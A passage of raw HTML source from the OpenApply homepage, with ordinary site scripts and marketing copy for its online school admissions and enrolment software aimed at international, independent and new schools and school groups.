</style> <link rel='stylesheet' id='et-builder-googlefonts-cached-css' href='https://fonts.googleapis.com/css?family=Open+Sans%3A300%2C300italic%2Cregular%2Citalic%2C600%2C600italic%2C700%2C700italic%2C800%2C800italic&#038;ver=4080f30f0170c8d69127243c5d7f0aae#038;subset=cyrillic,greek,vietnamese,latin,greek-ext,latin-ext,cyrillic-ext' type='text/css' media='all' /> <link rel='stylesheet' id='dashicons-css' href='https://assets.public-prod.openapply.com/wp-includes/css/dashicons.min.css.gzip?ver=4080f30f0170c8d69127243c5d7f0aae' type='text/css' media='all' /> <link rel='stylesheet' id='wp-featherlight-css' href='https://assets.public-prod.openapply.com/wp-content/plugins/wp-featherlight/css/wp-featherlight.min.css.gzip?ver=1.3.0' type='text/css' media='all' /> <script type='text/javascript' src='https://assets.public-prod.openapply.com/wp-includes/js/jquery/jquery.js.gzip?ver=1.12.4'></script> <script type='text/javascript' src='https://assets.public-prod.openapply.com/wp-includes/js/jquery/jquery-migrate.min.js.gzip?ver=1.4.1'></script> <script type='text/javascript' src='https://assets.public-prod.openapply.com/wp-content/plugins/sticky-menu-or-anything-on-scroll/assets/js/jq-sticky-anything.min.js.gzip?ver=2.1.1'></script> <script type='text/javascript' src='https://assets.public-prod.openapply.com/wp-content/plugins/wp-magnific-popup/js/wpmp.js.gzip?ver=4080f30f0170c8d69127243c5d7f0aae'></script> <link rel='https://api.w.org/' href='https://www.openapply.com/wp-json/' /> <link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://www.openapply.com/xmlrpc.php?rsd" /> <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://assets.public-prod.openapply.com/wp-includes/wlwmanifest.xml.gzip" /> <link rel='shortlink' href='https://www.openapply.com/' /> <link rel="alternate" type="application/json+oembed" href="https://www.openapply.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.openapply.com%2F" /> <link rel="alternate" type="text/xml+oembed" href="https://www.openapply.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.openapply.com%2F&#038;format=xml" /> <script type="text/javascript"> (function(url){ if(/(?:Chrome\/26\.0\.1410\.63 Safari\/537\.31|WordfenceTestMonBot)/.test(navigator.userAgent)){ return; } var addEvent = function(evt, handler) { if (window.addEventListener) { document.addEventListener(evt, handler, false); } else if (window.attachEvent) { document.attachEvent('on' + evt, handler); } }; var removeEvent = function(evt, handler) { if (window.removeEventListener) { document.removeEventListener(evt, handler, false); } else if (window.detachEvent) { document.detachEvent('on' + evt, handler); } }; var evts = 'contextmenu dblclick drag dragend dragenter dragleave dragover dragstart drop keydown keypress keyup mousedown mousemove mouseout mouseover mouseup mousewheel scroll'.split(' '); var logHuman = function() { if (window.wfLogHumanRan) { return; } window.wfLogHumanRan = true; var wfscr = document.createElement('script'); wfscr.type = 'text/javascript'; wfscr.async = true; wfscr.src = url + '&r=' + Math.random(); (document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(wfscr); for (var i = 0; i < evts.length; i++) { removeEvent(evts[i], logHuman); } }; for (var i = 0; i < evts.length; i++) { addEvent(evts[i], logHuman); } })('//www.openapply.com/?wordfence_lh=1&hid=E2D41A7A80561F9E7097604639F9C394'); </script> <script type="text/javascript"> var wpmp_options = { image: {"class":"mpopup","vertical_fit":1,"zoom_enabled":0,"disable_on":400}, gallery: {"class":"popup-gallery","disable_on":400}, iframe: {"class":"mpopup_iframe","width":900,"disable_on":400}, div: {"class":"mpopup_div","disable_on":400}, image_loading_text: 'Loading image #%curr%...', image_error_text: '<a href="%url%">The image #%curr%</a> could not be loaded.' }; </script> <style type="text/css" id="et-social-custom-css"> </style><meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" /><link rel="icon" href="https://assets.public-prod.openapply.com/wp-content/uploads/2016/10/cropped-oa-32x32.png" sizes="32x32" /> <link rel="icon" href="https://assets.public-prod.openapply.com/wp-content/uploads/2016/10/cropped-oa-192x192.png" sizes="192x192" /> <link rel="apple-touch-icon-precomposed" href="https://assets.public-prod.openapply.com/wp-content/uploads/2016/10/cropped-oa-180x180.png" /> <meta name="msapplication-TileImage" content="https://assets.public-prod.openapply.com/wp-content/uploads/2016/10/cropped-oa-270x270.png" /> <script> (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','https://www.google-analytics.com/analytics.js','ga'); ga('create', 'UA-30848013-3', 'auto'); ga('require', 'displayfeatures'); ga('send', 'pageview'); </script> <link rel="stylesheet" id="et-core-unified-cached-inline-styles" href="https://www.openapply.com/wp-content/cache/et/120788/et-core-unified-1558011171239.min.css" onerror="et_core_page_resource_fallback(this, true)" onload="et_core_page_resource_fallback(this)" /></head> <body id="navTransparent" class="home page-template-default page page-id-120788 et_transparent_nav et_monarch wp-featherlight-captions et_pb_button_helper_class et_fullwidth_nav et_fullwidth_secondary_nav et_fixed_nav et_show_nav et_cover_background et_pb_gutter et_pb_gutters3 et_primary_nav_dropdown_animation_fade et_secondary_nav_dropdown_animation_slide et_pb_footer_columns4 et_header_style_left et_pb_pagebuilder_layout et_right_sidebar et_divi_theme et-db et_minified_js et_minified_css"> <script type="text/javascript"> jQuery(window).load(function() { jQuery('.loadingbox').hide(); // jQuery('html, body').stop().animate({ scrollTop: 0 }, 0); }); </script> <div class="loadingbox"> <div class="spinner-preview"> <div class="card"> <div id="loader_middle"><img src="https://assets.public-prod.openapply.com/wp-content/uploads/2016/10/oalogo_loader.png" width="35" style="padding-top: 5px;"></div> <div class="loader"> <svg xmlns=http://www.w3.org/2000/svg viewBox="0 0 100 100"> <circle class="shape-circle" fill="#1ecd6e" cx=50 cy=50 r="6" /> </svg> <svg xmlns=http://www.w3.org/2000/svg viewBox="0 0 100 100"> <circle class="shape-circle" fill="#1ecd6e" cx=50 cy=50 r="6" /> </svg> <svg xmlns=http://www.w3.org/2000/svg viewBox="0 0 100 100"> <circle class="shape-circle" fill="#1ecd6e" cx=50 cy=50 r="6" /> </svg> <svg xmlns=http://www.w3.org/2000/svg viewBox="0 0 100 100"> <circle class="shape-circle" fill="#1ecd6e" cx=50 cy=50 r="6" /> </svg> <svg xmlns=http://www.w3.org/2000/svg viewBox="0 0 100 100"> <circle class="shape-circle" fill="#1ecd6e" cx=50 cy=50 r="6" /> </svg> <svg xmlns=http://www.w3.org/2000/svg viewBox="0 0 100 100"> <circle class="shape-circle" fill="#1ecd6e" cx=50 cy=50 r="6" /> </svg> <svg xmlns=http://www.w3.org/2000/svg viewBox="0 0 100 100"> <circle class="shape-circle" fill="#1ecd6e" cx=50 cy=50 r="6" /> </svg> <svg xmlns=http://www.w3.org/2000/svg viewBox="0 0 100 100"> <circle class="shape-circle" fill="#1ecd6e" cx=50 cy=50 r="6" /> </svg> <svg xmlns=http://www.w3.org/2000/svg viewBox="0 0 100 100"> <circle class="shape-circle" fill="#1ecd6e" cx=50 cy=50 r="6" /> </svg> <svg xmlns=http://www.w3.org/2000/svg viewBox="0 0 100 100"> <circle class="shape-circle" fill="#1ecd6e" cx=50 cy=50 r="6" /> </svg> <svg xmlns=http://www.w3.org/2000/svg viewBox="0 0 100 100"> <circle class="shape-circle" fill="#1ecd6e" cx=50 cy=50 r="6" /> </svg> <svg xmlns=http://www.w3.org/2000/svg viewBox="0 0 100 100"> <circle class="shape-circle" fill="#1ecd6e" cx=50 cy=50 r="6" /> </svg> </div> </div> </div> </div> <div id="page-container"> <header id="main-header" data-height-onload="60"> <div class="top-header-cust hide"> <div class="faria-product"> <ul class="group-footer"> <li><a href="https://www.managebac.com">ManageBac</a></li> <li class="active"><a href="https://www.openapply.com">OpenApply</a></li> </ul> </div> </div> <div class="container clearfix et_menu_container"> <div class="logo_container"> <span class="logo_helper"></span> <a href="https://www.openapply.com/"> <img src="https://assets.public-prod.openapply.com/images/oa_logo_n.png" alt="OpenApply" id="logo" data-height-percentage="60" /> <img src="https://assets.public-prod.openapply.com/images/oa_logo_white.png" alt="OpenApply" id="logo2" data-height-percentage="60" /> </a> </div> <div id="et-top-navigation" data-height="60" data-fixed-height="40"> <nav id="top-menu-nav"> <ul id="top-menu" class="nav"><li id="menu-item-119428" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-119428"><a href="https://www.openapply.com/features/">Features</a></li> <li id="menu-item-119429" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-119429"><a href="https://www.openapply.com/about/">About</a></li> <li id="menu-item-119430" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-119430"><a href="#">Resources</a> <ul class="sub-menu"> <li id="menu-item-119431" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-119431"><a href="https://www.openapply.com/blog/">Blog</a></li> <li id="menu-item-119432" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-119432"><a href="https://www.openapply.com/bulletin/">International Admissions Bulletin</a></li> <li id="menu-item-119433" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-119433"><a href="https://events.openapply.com">Events &#038; Webinars</a></li> <li id="menu-item-119973" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-119973"><a href="https://www.openapply.com/webinars/">Webinars On Demand</a></li> </ul> </li> <li id="menu-item-119434" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-119434"><a href="#">Support</a> <ul class="sub-menu"> <li id="menu-item-119438" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-119438"><a href="http://help.openapply.com/">Support Centre</a></li> <li id="menu-item-120475" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-120475"><a target="_blank" href="https://www.openapply.com/schedule-demo/">Schedule a Demo</a></li> <li id="menu-item-120482" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-120482"><a target="_blank" href="https://www.openapply.com/schedule-training/">Schedule a Training</a></li> <li id="menu-item-119435" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-119435"><a href="https://www.openapply.com/contact/">Contact</a></li> </ul> </li> <li id="menu-item-119439" class="button signup menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-119439"><a>Get Started</a> <ul class="sub-menu"> <li id="menu-item-120720" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-120720"><a href="/signup">Admin</a></li> <li id="menu-item-120722" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-120722"><a href="/login">Parent</a></li> </ul> </li> <li id="menu-item-120356" class="button login menu-item menu-item-type-custom menu-item-object-custom menu-item-120356"><a href="/login">Login</a></li> <li id="menu-item-120827" class="f-product menu-item menu-item-type-custom menu-item-object-custom current-menu-item current_page_item menu-item-has-children menu-item-120827"><a href="/">Services</a> <ul class="sub-menu"> <li id="menu-item-120828" class="atlas menu-item menu-item-type-custom menu-item-object-custom menu-item-120828"><a href="https://onatlas.com/">Atlas</a></li> <li id="menu-item-120829" class="oa menu-item menu-item-type-custom menu-item-object-custom menu-item-120829"><a href="https://openapply.com">OpenApply</a></li> <li id="menu-item-120830" class="mb menu-item menu-item-type-custom menu-item-object-custom menu-item-120830"><a href="https://managebac.com">ManageBac</a></li> </ul> </li> </ul> </nav> <div id="et_mobile_nav_menu"> <div class="mobile_nav closed"> <span class="select_page">Select Page</span> <span class="mobile_menu_bar mobile_menu_bar_toggle"></span> </div> </div> </div> </div> <div class="et_search_outer"> <div class="container et_search_form_container"> <form role="search" method="get" class="et-search-form" action="https://www.openapply.com/"> <input type="search" class="et-search-field" placeholder="Search &hellip;" value="" name="s" title="Search for:" /> </form> <span class="et_close_search_field"></span> </div> </div> </header> <div id="et-main-area"> <div id="main-content"> <article id="post-120788" class="post-120788 page type-page status-publish hentry"> <div class="entry-content"> <div id="et-boc" class="et-boc"> <div class="et_builder_inner_content et_pb_gutters3"> <div id="home-intro" class="et_pb_section et_pb_section_0 et_pb_with_background et_pb_section_parallax et_section_regular"> <div class="et_parallax_bg et_pb_parallax_css" style="background-image: url(https://assets.public-prod.openapply.com/images/home/main-bg.svg);"></div> <div class="et_pb_row et_pb_row_0 et_pb_gutters1"> <div class="et_pb_column et_pb_column_1_3 et_pb_column_0 et_pb_css_mix_blend_mode_passthrough" id="intro-text"> <div class="et_pb_module et_pb_text et_pb_text_0 et_pb_bg_layout_dark et_pb_text_align_left"> <div class="et_pb_text_inner"> <h2 class="home2-title">The Paperless Admissions Office</h2> <p class="main-text-after">Simplify the admissions process for applicants &amp; families from enquiry to enrolment</p> </div> </div> <div id="btn-btn" class="et_pb_module et_pb_text et_pb_text_1 et_pb_bg_layout_light et_pb_text_align_left"> <div class="et_pb_text_inner"> <p><a class="commonButton blue" href="/schedule-demo" target="_blank">Schedule a demo</a></p> </div> </div> </div> <div class="et_pb_column et_pb_column_2_3 et_pb_column_1 et_pb_css_mix_blend_mode_passthrough" id="intro-img"> <div class="et_pb_module et_pb_code et_pb_code_0 video_intro"> <div class="et_pb_code_inner"> <div class="et_pb_video_overlay" style="background-image: url(/videos/oa_thumb1.png);"> </div><p> </p> <div class="et_pb_video_overlay_hover"> <a href="https://www.youtube.com/watch?v=VXCpI--Wr9w" class="et_pb_video_play">PLAY VIDEO</a> </div> </div> </div> </div> </div> </div> <div class="et_pb_section et_pb_section_1 et_section_regular"> <div id="tab-tabs" class="et_pb_row et_pb_row_1 et_pb_gutters1 et_pb_row_fullwidth"> <div class="et_pb_column et_pb_column_4_4 et_pb_column_2 et_pb_css_mix_blend_mode_passthrough et-last-child"> <div class="et_pb_module et_pb_code et_pb_code_1"> <div class="et_pb_code_inner"> <div class="tabs-desktop-home hidden-xs"> <div class="tab-header colourful"> <ul class="nav nav-pills" id="myTabs"> <li class="active"><a href="#tab-1" data-toggle="tab" id="icon1">International Schools</a></li ><li><a data-target="#tab-2" data-toggle="tab" id="icon2">Independent Schools</a></li ><li><a data-target="#tab-3" data-toggle="tab" id="icon3">New Schools</a></li ><li><a data-target="#tab-4" data-toggle="tab" id="icon4">Greater China</a></li ><li><a data-target="#tab-5" data-toggle="tab" id="icon5">School Groups</a></li> </ul> </div> <div class="tab-content well colourful"> <div class="tab-pane active" id="tab-1"> <div class="et_pb_tab clearfix"> <h2 style="text-align: center;">International Schools</h2> <p style="text-align: center;">Originally built specifically for international schools, OpenApply helps increase your applications and saves time and money on admin work. Online bilingual forms, easy data management, streamlined re-enrolment, and unlimited 24-hour support provide a smooth experience for your school.</p> <ul id="sub-lists"> <li> <span><img src="https://assets.public-prod.openapply.com/images/home/icon/online_application_management.png"></span> <h3>Online Application Management</h3> <p>Online application management allows you to access student application information from anywhere at any time.</p></li> <li> <span><img src="https://assets.public-prod.openapply.com/images/home/icon/re-enrolment.png"></span> <h3>Streamlined Re-Enrolment</h3> <p>Manage Re-Enrolment with OpenApply in only 4 easy steps!</p></li> <li> <span><img src="https://assets.public-prod.openapply.com/images/home/icon/24.png"></span> <h3>24-Hour Unlimited Support</h3> <p>OpenApply’s friendly support team is on call around the globe whenever you have a question. </p> </li> </ul> <div class="clearfix" style="margin-bottom: 3em;"></div> <p style="text-align: center;"><a class="commonButton blue tab" href="/international-schools">Learn More</a></p> </div> </div> <div class="tab-pane" id="tab-2"> <div class="tab-pane"> <div class="et_pb_tab clearfix"> <h2 style="text-align: center;">Independent Schools</h2> <p style="text-align: center;">OpenApply helps independent schools streamline their application process online, freeing up time and collecting valuable information for recruitment and marketing purposes.</p> <ul id="sub-lists"> <li> <span><img src="https://assets.public-prod.openapply.com/images/home/icon/online_application_management.png"></span> <h3>Online Application Management</h3> <p>Online application management allows you to access student application information from anywhere at any time.</p></li> <li> <span><img src="https://assets.public-prod.openapply.com/images/home/icon/parents.png"></span> <h3>Easy for Parents</h3> <p>Provide parents with a smooth, professional admissions experience by taking your entire process online.</p> </li> <li> <span><img src="https://assets.public-prod.openapply.com/images/home/icon/analytics.png"></span> <h3>Analytics Tracking</h3> <p>OpenApply provides both automated and customised solutions to organise and track all the analytics most important to your school.</p></li> </ul> <div class="clearfix" style="margin-bottom: 3em;"></div> <p style="text-align: center;"><a class="commonButton blue tab" href="/independent-schools">Learn More</a></p> </div> </div> </div> <div class="tab-pane" id="tab-3"> <div class="tab-pane"> <div class="et_pb_tab clearfix"> <h2 style="text-align: center;">New Schools</h2> <p style="text-align: center;">OpenApply helps new schools connect with prospective parents through online enquiry forms and Open House scheduling. Bulk messaging functions and robust filtering and tagging make it easy to keep new families interested and involved as you open your school.</p> <ul id="sub-lists"> <li> <span><img src="https://assets.public-prod.openapply.com/images/home/icon/information_management.png"></span> <h3>Information Management</h3> <p>Robust filtering, searching, and tagging helps you manage student information once the application process is complete.</p></li> <li> <span><img src="https://assets.public-prod.openapply.com/images/home/icon/analytics.png"></span> <h3>Analytics Tracking</h3> <p>OpenApply provides both automated and customised solutions to organise and track all the analytics most important for a new school.</p></li> <li> <span><img src="https://assets.public-prod.openapply.com/images/home/icon/setup.png"></span> <h3>Quick & Easy Implementation</h3> <p>When opening a new school you’ll want to start recruiting early.</p> </li> </ul> <div class="clearfix" style="margin-bottom: 3em;"></div> <p style="text-align: center;"><a class="commonButton blue tab" href="/new-schools">Learn More</a></p> </div> </div> </div> <div class="tab-pane" id="tab-4"> <div class="tab-pane"> <div class="et_pb_tab clearfix"> <h2 style="text-align: center;">Greater China</h2> <p style="text-align: center;">OpenApply provides an online admissions advantage for the competitive Chinese market. Local integrations and bilingual support make it easy for Chinese parents to apply online from any device.</p> <ul id="sub-lists"> <li> <span><img src="https://assets.public-prod.openapply.com/images/home/icon/language.png"></span> <h3>Chinese Language Support</h3> <p>OpenApply supports data entry in both simplified and traditional Chinese and provides a full bilingual parent interface that is responsive to mobile.</p></li> <li> <span><img src="https://assets.public-prod.openapply.com/images/home/icon/online_application_management.png"></span> <h3>Online Application Management</h3> <p>Online application management allows you to access student application information from anywhere at any time.</p></li> <li> <span><img src="https://assets.public-prod.openapply.com/images/home/icon/optimised.png"></span> <h3>Optimised for China</h3> <p>In the last year we have rolled out a WeChat integration and Chinese parent interface. OpenApply is committed to expanding its support of localised features.</p> </li> </ul> <div class="clearfix" style="margin-bottom: 3em;"></div> <p style="text-align: center;"><a class="commonButton blue tab" href="/greater-china">Learn More</a></p> </div> </div> </div> <div class="tab-pane" id="tab-5"> <div class="tab-pane"> <div class="et_pb_tab clearfix"> <h2 style="text-align: center;">School Groups</h2> <p style="text-align: center;">OpenApply offers an elegant solution for groups to track all admissions with easy switching between school level accounts and options to standardise or customise per school as needed.</p> <ul id="sub-lists"> <li> <span><img src="https://assets.public-prod.openapply.com/images/home/icon/analytics.png"></span> <h3>Analytics Tracking</h3> <p>OpenApply provides both automated and customised solutions to organise and track all the analytics most important to your school group.</p></li> <li> <span><img src="https://assets.public-prod.openapply.com/images/home/icon/setup.png"></span> <h3>Quick and Easy Implementation</h3> <p>Accounts for all schools in your group can be implemented quickly with the help of our friendly support team and customised on a per school basis as needed.</p></li> <li> <span><img src="https://assets.public-prod.openapply.com/images/home/icon/launcpad.png"></span> <h3>Launchpad Access</h3> <p>OpenApply’s Launchpad Single-Sign-On feature means that you can easily access any OpenApply account for your school group at any time.</p> </li> </ul> <div class="clearfix" style="margin-bottom: 3em;"></div> <p style="text-align: center;"><a class="commonButton blue tab" href="/school-groups">Learn More</a></p> </div> </div> </div> </div> </div> <div class="tabs-mobile-home school-type visible-xs"> <div class="panel panel-default"> <div class="panel-heading" role="tab" id="headingOne"> <h4 class="panel-title icon1"> <a role="button" data-toggle="collapse" data-parent="#accordion" data-target="#international_schools" aria-expanded="true" aria-controls="international_schools"> International Schools </a> </h4> </div> <div id="international_schools" class="panel-collapse collapse in" role="tabpanel" aria-labelledby="headingOne"> <div class="panel-body" id="tab-tabs"> <div class="et_pb_tab clearfix"> <p style="text-align: center;">Originally built specifically for international schools, OpenApply helps increase your applications and saves time and money on admin work. Online bilingual forms, easy data management, streamlined re-enrolment, and unlimited 24-hour support provide a smooth experience for your school.</p> <p style="text-align: center;"><a class="commonButton blue tab" href="/international-schools">Learn More</a></p> </div> </div> </div> </div> <div class="panel panel-default"> <div class="panel-heading" role="tab" id="headingTwo"> <h4 class="panel-title icon2"> <a class="collapsed" role="button" data-toggle="collapse" data-parent="#accordion" data-target="#independent_schools" aria-expanded="false" aria-controls="independent_schools"> Independent Schools </a> </h4> </div> <div id="independent_schools" class="panel-collapse collapse" role="tabpanel" aria-labelledby="headingTwo"> <div class="panel-body"> <div class="et_pb_tab clearfix"> <p style="text-align: center;">OpenApply helps independent schools streamline their application process online, freeing up time and collecting valuable information for recruitment and marketing purposes.</p> <p style="text-align: center;"><a class="commonButton blue tab" href="/independent-schools">Learn More</a></p> </div> </div> </div> </div> <div class="panel panel-default"> <div class="panel-heading" role="tab" id="headingThree"> <h4 class="panel-title icon3"> <a class="collapsed" role="button" data-toggle="collapse" data-parent="#accordion" data-target="#new_schools" aria-expanded="false" aria-controls="new_schools"> New Schools </a> </h4> </div> <div id="new_schools" class="panel-collapse collapse" role="tabpanel" aria-labelledby="headingThree"> <div class="panel-body"> <div class="et_pb_tab clearfix"> <p style="text-align: center;">New schools need an easy way to schedule recruitment events and collect information for prospective families. OpenApply’s online event scheduling and customisable forms makes this process smooth for both parents and admissions alike.</p> <p style="text-align: center;"><a class="commonButton blue tab" href="/new-schools">Learn More</a></p> </div> </div> </div> </div> <div class="panel panel-default"> <div class="panel-heading" role="tab" id="headingFour"> <h4 class="panel-title icon4"> <a class="collapsed" role="button" data-toggle="collapse" data-parent="#accordion" data-target="#greater_china" aria-expanded="false" aria-controls="greater_china"> Greater China </a> </h4> </div> <div id="greater_china" class="panel-collapse collapse" role="tabpanel" aria-labelledby="headingFour"> <div class="panel-body"> <div class="et_pb_tab clearfix"> <p style="text-align: center;">OpenApply provides an online admissions advantage for the competitive Chinese market. Local integrations and bilingual support make it easy for Chinese parents to apply online from any device.</p> <p style="text-align: center;"><a class="commonButton blue tab" href="/greater-china">Learn More</a></p> </div> </div> </div> </div> <div class="panel panel-default"> <div class="panel-heading" role="tab" id="headingFive"> <h4 class="panel-title icon5"> <a class="collapsed" role="button" data-toggle="collapse" data-parent="#accordion" data-target="#school_groups" aria-expanded="false" aria-controls="school_groups"> School Groups </a> </h4> </div> <div id="school_groups" class="panel-collapse collapse" role="tabpanel" aria-labelledby="headingFive"> <div class="panel-body"> <div class="et_pb_tab clearfix"> <p style="text-align: center;">OpenApply provides both automated and customised solutions to organise and track all the analytics most important to your school group. Easily access conversion rates and seat tracking for all your schools while being able to customise your analysis of referral sources and demographics according to each school’s situation.</p> <p style="text-align: center;"><a class="commonButton blue tab" href="/school-groups">Learn More</a></p> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> <div id="conference-video" class="et_pb_section et_pb_section_2 et_section_regular et_section_transparent"> <div class="et_pb_row et_pb_row_2 et_animated et_pb_gutters2"> <div class="et_pb_column et_pb_column_1_3 et_pb_column_3 et_pb_css_mix_blend_mode_passthrough"> <div class="et_pb_module et_pb_text et_pb_text_2 section-title dark et_pb_bg_layout_light et_pb_text_align_left"> <div class="et_pb_text_inner"> <p>Our latest OpenApply Admissions Conferences</p> </div> </div> <div class="et_pb_module et_pb_code et_pb_code_2 conference-events"> <div class="et_pb_code_inner"> <div style="margin-bottom: 1.5em;" id="first"> <p><img src="https://assets.public-prod.openapply.com/images/home/icon/copenhagennn.png"></p> <h4><a href="https://www.openapply.com/2018/05/openapply-admissions-conference-copenhagen-recap/">Copenhagen</a></h4> <span>May 18-19, 2018</span> </div> <div id="mumbai" style="margin-bottom: 1.2em;"> <p><img src="https://assets.public-prod.openapply.com/images/home/icon/hongkong.png"></p> <h4><a href="https://www.openapply.com/2018/11/openapply-admissions-conference-hong-kong-recap/">Hong Kong</a></h4> <span> November 9-10, 2018</span> </div> <div> <p><img src="https://assets.public-prod.openapply.com/images/home/icon/milan.png" style="height: 43px;right:-2px;"></p> <h4><a href="https://www.openapply.com/2019/04/openapply-admissions-conference-milan-recap/">Milan</a></h4> <span>March 29-30, 2019</span> </div> </div> </div> <div class="et_pb_module et_pb_divider et_pb_divider_0 et_pb_divider_position_center et_pb_space"><div class="et_pb_divider_internal"></div></div><div class="et_pb_button_module_wrapper et_pb_button_0_wrapper et_pb_button_alignment_left et_pb_module "> <a class="et_pb_button et_pb_custom_button_icon et_pb_button_0 button-textonly blue et_hover_enabled et_pb_bg_layout_light" href="https://events.openapply.com/" data-icon="&#x45;">Upcoming Events</a> </div> </div> <div class="et_pb_column et_pb_column_2_3 et_pb_column_4 et_pb_css_mix_blend_mode_passthrough" id="video-embed"> <div class="et_pb_module et_pb_video et_pb_video_0"> <div class="et_pb_video_box"> <iframe width="1080" height="608" src="https://www.youtube.com/embed/0tsMjsY2uBM?feature=oembed" frameborder="0" allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe> </div> <div class="et_pb_video_overlay" style="background-image: url(/videos/oac_bcn_video_thumb.jpg);"> <div class="et_pb_video_overlay_hover"> <a href="#" class="et_pb_video_play"></a> </div> </div> </div> </div> </div> <div class="et_pb_row et_pb_row_3 et_animated"> <div class="et_pb_column et_pb_column_1_2 et_pb_column_5 et_pb_css_mix_blend_mode_passthrough"> <div class="et_pb_module et_pb_image et_pb_image_0 et_animated et-waypoint et_always_center_on_mobile"> <span class="et_pb_image_wrap "><img src="https://assets.public-prod.openapply.com/images/lms/oa-go.png" alt="" /></span> </div> </div> <div class="et_pb_column et_pb_column_1_2 et_pb_column_6 et_pb_css_mix_blend_mode_passthrough" id="integrated-text"> <div class="et_pb_module et_pb_text et_pb_text_3 section-title dark et_animated et_pb_bg_layout_light et_pb_text_align_left"> <div class="et_pb_text_inner"> <p>Online Admissions &amp; Enrolment</p> </div> </div> <div class="et_pb_module et_pb_text et_pb_text_4 et_animated et_pb_bg_layout_light et_pb_text_align_left"> <div class="et_pb_text_inner"> <p>Schools and prospective families face daily frustrations with outdated and confusing application and enrolment processes that affect multiple departments including admissions, finance, IT, and academics.</p> <p>By combining a streamlined, online process and easy information management with a consistent, modern and mobile-friendly interface, OpenApply provides a seamless &amp; integrated experience for everyone involved in the admissions and enrolment process.</p> </div> </div> <div class="et_pb_module et_pb_divider et_pb_divider_1 et_animated et_pb_divider_position_center et_pb_space"><div class="et_pb_divider_internal"></div></div><div class="et_pb_button_module_wrapper et_pb_button_1_wrapper et_pb_button_alignment_left et_pb_module "> <a class="et_pb_button et_pb_custom_button_icon et_pb_button_1 button-textonly blue et_animated et_hover_enabled et_pb_bg_layout_light" href="/go" data-icon="&#x45;">Explore more</a> </div> </div> </div> </div> <div id="bulletin-payment" class="et_pb_section et_pb_section_3 et_pb_with_background et_section_regular"> <div id="title-section" class="et_pb_row et_pb_row_4 et_animated"> <div class="et_pb_column et_pb_column_1_2 et_pb_column_7 et_pb_css_mix_blend_mode_passthrough"> <div class="et_pb_module et_pb_text et_pb_text_5 et_pb_bg_layout_light et_pb_text_align_left"> <div class="et_pb_text_inner"> <h2>The International Admissions Bulletin</h2> </div> </div> <div id="bulletin-cover" class="et_pb_module et_pb_image et_pb_image_1 et_always_center_on_mobile"> <a href="/bulletin/sep-2018" target="_blank"><span class="et_pb_image_wrap "><img src="https://assets.public-prod.openapply.com/images/iab/IAB-issue5-cover.png" alt="" /></span></a> </div><div class="et_pb_module et_pb_text et_pb_text_6 iab-desc et_pb_bg_layout_light et_pb_text_align_left"> <div class="et_pb_text_inner"> <p><strong>Our September issue discusses Going Digital with your admissions and marketing featuring:</strong></p> <div class="page" title="Page 11"> <div class="layoutArea"> <div class="column"> <div class="page" title="Page 11"> <div class="layoutArea"> <div class="column"> <ul style="color: #5a6c87"> <li>Tools and strategies for admissions and marketing to reach the modern family</li> <li>How to successfully navigate a website redesign</li> <li>Tips for collecting a higher quality and quantity of inquiries</li> <li>Ensuring your strategies are compliant with tightening regulations</li> <li>Professional Development Opportunities, International School News, and an exciting School Spotlight!</li> </ul> </div> </div> </div> </div> </div> </div> <p><a class="button-textonly blue" href="/bulletin">Read it now</a></p> </div> </div> </div> <div class="et_pb_column et_pb_column_1_2 et_pb_column_8 et_pb_css_mix_blend_mode_passthrough"> <div class="et_pb_module et_pb_text et_pb_text_7 et_pb_bg_layout_light et_pb_text_align_left"> <div class="et_pb_text_inner"> <h2>Global Payments</h2> </div> </div> <div class="et_pb_module et_pb_text et_pb_text_8 et_pb_bg_layout_light et_pb_text_align_left"> <div class="et_pb_text_inner"> <p><strong>OpenApply partners with popular online payment providers to accept online payments of application and admissions related fees in over 110 different currencies supported.</strong></p> </div> </div> <div class="et_pb_module et_pb_code et_pb_code_3"> <div class="et_pb_code_inner"> <ul class="payments"><li><img src="https://assets.public-prod.openapply.com/images/payment/stripe.svg.gzip"></li><li><img src="https://assets.public-prod.openapply.com/images/payment/paypal.svg.gzip"></li><li><img src="https://assets.public-prod.openapply.com/images/payment/braintree.svg.gzip"></li><li><img src="https://assets.public-prod.openapply.com/images/payment/cybersource.svg.gzip"></li><li><img src="https://assets.public-prod.openapply.com/images/payment/hostedpci.png" style="width:125px;"></li></ul> </div> </div> <div class="et_pb_module et_pb_code et_pb_code_4"> <div class="et_pb_code_inner"> <p><strong> Currencies:</strong></p> <ul class="currency"><li><img src="https://assets.public-prod.openapply.com/images/flags/us1.png"> USD</li><li><img src="https://assets.public-prod.openapply.com/images/flags/sg1.png"> SGD</li><li><img src="https://assets.public-prod.openapply.com/images/flags/china.png"> CNY</li><li><img src="https://assets.public-prod.openapply.com/images/flags/aed.png"> AED</li><li><img src="https://assets.public-prod.openapply.com/images/flags/euro.jpg"> EUR</li><li><img src="https://assets.public-prod.openapply.com/images/flags/uk1.png"> GBP</li><li><img 